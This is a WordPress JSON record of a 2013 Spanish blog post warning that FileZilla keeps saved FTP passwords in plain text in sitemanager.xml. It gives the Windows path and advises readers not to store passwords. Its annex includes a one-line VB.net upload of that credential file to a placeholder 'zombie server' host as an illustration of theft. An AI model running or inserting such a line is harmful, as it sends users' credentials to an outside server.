{"id":4904,"date":"2013-06-07T20:05:20","date_gmt":"2013-06-07T18:05:20","guid":{"rendered":"http:\/\/www.palentino.es\/blog\/?p=4904"},"modified":"2013-06-10T13:35:13","modified_gmt":"2013-06-10T11:35:13","slug":"la-sangrante-herida-de-filezilla","status":"publish","type":"post","link":"https:\/\/www.palentino.es\/blog\/la-sangrante-herida-de-filezilla\/","title":{"rendered":"La sangrante herida de FileZilla"},"content":{"rendered":"<div id=\"palen-2179951169\" class=\"palen-antes-del-contenido palen-entity-placement\"><div class=\"palen-adlabel\">Anuncios<\/div><script async src=\"\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js?client=ca-pub-2815317153396146\" crossorigin=\"anonymous\"><\/script><ins class=\"adsbygoogle\" style=\"display:inline-block;width:300px;height:250px;\" \ndata-ad-client=\"ca-pub-2815317153396146\" \ndata-ad-slot=\"4593837716\"><\/ins> \n<script> \n(adsbygoogle = window.adsbygoogle || []).push({}); \n<\/script>\n<\/div><p>En esta ocasi\u00f3n os voy a exponer uno de los graves problemas que contin\u00faan existiendo en el cliente FTP m\u00e1s extendido en la actualidad.<\/p>\n<p>Hablamos de FileZilla.<\/p>\n<p>La gravedad del asunto padece que a \u00a0los propios creadores del programa no les preocupa, la reconocen, dejan en manos del usuario la correcci\u00f3n, y no hacen nada para evitarlo.<\/p>\n<p>Sepamos cual es el problema. Es necesario darlo a conocer.<\/p>\n<p><!--more--><\/p>\n<p>Cuando usamos el programa para hacer un FTP, solemos almacenar los datos de configuraci\u00f3n de la m\u00e1quina.<\/p>\n<p>Entre ellos: Direcci\u00f3n FTP, puerto, usuario, password.\u00a0Pulsamos en bot\u00f3n, y vo\u00edla, estamos conectados.<\/p>\n<p>Pero no nos hemos percatado de un grave problema.<\/p>\n<p><strong>La contrase\u00f1a no se almacena cifrada<\/strong>, y no s\u00f3lo eso, aquellas de<strong> todos los sitios que almacenes con el programa,<\/strong> quedar\u00e1n expuestas.<\/p>\n<p>Esa password queda reflejada en un fichero <strong>XML<\/strong>, perfectamente legible.<\/p>\n<p>Cualquier <strong>troyano puede capturarlo<\/strong> o realizar una b\u00fasqueda a trav\u00e9s del disco duro y enviarlo a un servidor externo.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"4908\" data-permalink=\"https:\/\/www.palentino.es\/blog\/la-sangrante-herida-de-filezilla\/filezilla-1\/\" data-orig-file=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/FileZilla-1.jpg\" data-orig-size=\"605,439\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}\" data-image-title=\"FileZilla-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/FileZilla-1.jpg\" class=\"aligncenter size-full wp-image-4908\" alt=\"FileZilla-1\" src=\"http:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/FileZilla-1.jpg\" width=\"605\" height=\"439\" srcset=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/FileZilla-1.jpg 605w, https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/FileZilla-1-300x217.jpg 300w\" sizes=\"auto, (max-width: 605px) 100vw, 605px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>El procedimiento m\u00e1s recomendable es este.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"4909\" data-permalink=\"https:\/\/www.palentino.es\/blog\/la-sangrante-herida-de-filezilla\/filezilla-2\/\" data-orig-file=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-2.jpg\" data-orig-size=\"605,439\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}\" data-image-title=\"Filezilla-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-2.jpg\" class=\"aligncenter size-full wp-image-4909\" alt=\"Filezilla-2\" src=\"http:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-2.jpg\" width=\"605\" height=\"439\" srcset=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-2.jpg 605w, https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-2-300x217.jpg 300w\" sizes=\"auto, (max-width: 605px) 100vw, 605px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>La ruta del archivo almacenado en formato plano sobre Windows 7, \u00a0se encuentra en:<\/p>\n<p><strong>C:\\Users\\TU_USUARIO\\AppData\\Roaming\\FileZilla<\/strong><\/p>\n<p>Dentro de esta carpeta se mostrar\u00e1n una serie de archivos .xml y el sitemanager.xml , donde se almacenan las password sin cifrar.<\/p>\n<p>En windows 8 se muestran en esta ruta, archivos ocultos por cierto.<\/p>\n<p><a href=\"http:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-en-Windows8.jpg\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"4911\" data-permalink=\"https:\/\/www.palentino.es\/blog\/la-sangrante-herida-de-filezilla\/filezilla-en-windows8\/\" data-orig-file=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-en-Windows8.jpg\" data-orig-size=\"687,411\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}\" data-image-title=\"Filezilla-en-Windows8\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-en-Windows8.jpg\" class=\"aligncenter size-full wp-image-4911\" alt=\"Filezilla-en-Windows8\" src=\"http:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-en-Windows8.jpg\" width=\"687\" height=\"411\" srcset=\"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-en-Windows8.jpg 687w, https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/Filezilla-en-Windows8-300x179.jpg 300w\" sizes=\"auto, (max-width: 687px) 100vw, 687px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Y repito, es relativamente f\u00e1ci<strong>l crear un programa que env\u00ede estos ficheros a un servidor de Internet<\/strong>.<\/p>\n<p>Por lo que <strong>nunca almacen\u00e9is las contrase\u00f1as en el FileZilla<\/strong>.<\/p>\n<p>Los creadores de FileZilla, lo saben, pero su respuesta es que e<strong>l cifrado debe ser realizado por cada usuario en funci\u00f3n de su sistema operativo<\/strong>.<\/p>\n<p>Esto es muy &#8220;bonito&#8221;, pero les preguntar\u00eda una serie de \u00a0cuestiones:<\/p>\n<p>1- \u00bfQue usuario lo sabe?.<\/p>\n<p>2- \u00bfC\u00f3mo el usuario lo hace?.<\/p>\n<p>3- \u00a0\u00bfCu\u00e1ntos realmente lo har\u00edan?<\/p>\n<p>4- Si fuese as\u00ed, \u00bfd\u00f3nde se almacenan esos ficheros?.<br \/>\nQue por cierto ellos ocultan, en una ruta no muy accesible. Poco conocida.<\/p>\n<p><strong>IMPORTANTE<\/strong><\/p>\n<p>Cualquier proceso, web con malware, programa no seguro que ejecutemos, acceso remoto o \u00a0acceso a la m\u00e1quina, podr\u00e1 acceder a esta informaci\u00f3n y subirla a Internet en menos de 1 segundo.<\/p>\n<p>Luego vendr\u00e1n las consecuencias.<\/p>\n<p>Aviso, tomad medidas,\u00a0el FileZilla sigue sangrando &#8230;<\/p>\n<p><strong>ANEXO:<\/strong><\/p>\n<p>Subir un fichero en VB.net.<\/p>\n<h6>My.Computer.Network.UploadFile(&#8220;<strong>C:\\Users\\TU_USUARIO\\AppData\\Roaming\\FileZilla\\archivo.xml<\/strong>&#8220;, &#8220;http:\/\/<strong>www.servidorzombie.com\/ficheros<\/strong>&#8220;)<\/h6>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div id=\"palen-2250305263\" class=\"palen-despues-del-contenido palen-entity-placement\"><div class=\"palen-adlabel\">Anuncios<\/div><script async src=\"\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js?client=ca-pub-2815317153396146\" crossorigin=\"anonymous\"><\/script><ins class=\"adsbygoogle\" style=\"display:block;\" data-ad-client=\"ca-pub-2815317153396146\" \ndata-ad-slot=\"\" \ndata-ad-format=\"auto\" data-full-width-responsive=\"true\"><\/ins>\n<script> \n(adsbygoogle = window.adsbygoogle || []).push({}); \n<\/script>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>En esta ocasi\u00f3n os voy a exponer uno de los graves problemas que contin\u00faan existiendo en el cliente FTP m\u00e1s extendido en la actualidad. Hablamos de FileZilla. La gravedad del asunto padece que a \u00a0los propios creadores del programa no les preocupa, la reconocen, dejan en manos del usuario la correcci\u00f3n, y no hacen nada para evitarlo. Sepamos cual es el problema. Es necesario darlo a conocer.<\/p>\n","protected":false},"author":1,"featured_media":4905,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_feature_clip_id":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"jetpack_post_was_ever_published":false},"categories":[50,7],"tags":[143],"class_list":["post-4904","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-seguridad","category-software","tag-filezilla"],"views":3189,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/www.palentino.es\/blog\/wp-content\/uploads\/2013\/06\/la-sangrante-herida-de-filezilla.jpg","jetpack_shortlink":"https:\/\/wp.me\/p2ECph-1h6","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/4904","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/comments?post=4904"}],"version-history":[{"count":13,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/4904\/revisions"}],"predecessor-version":[{"id":4918,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/4904\/revisions\/4918"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/media\/4905"}],"wp:attachment":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/media?parent=4904"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/categories?post=4904"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/tags?post=4904"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}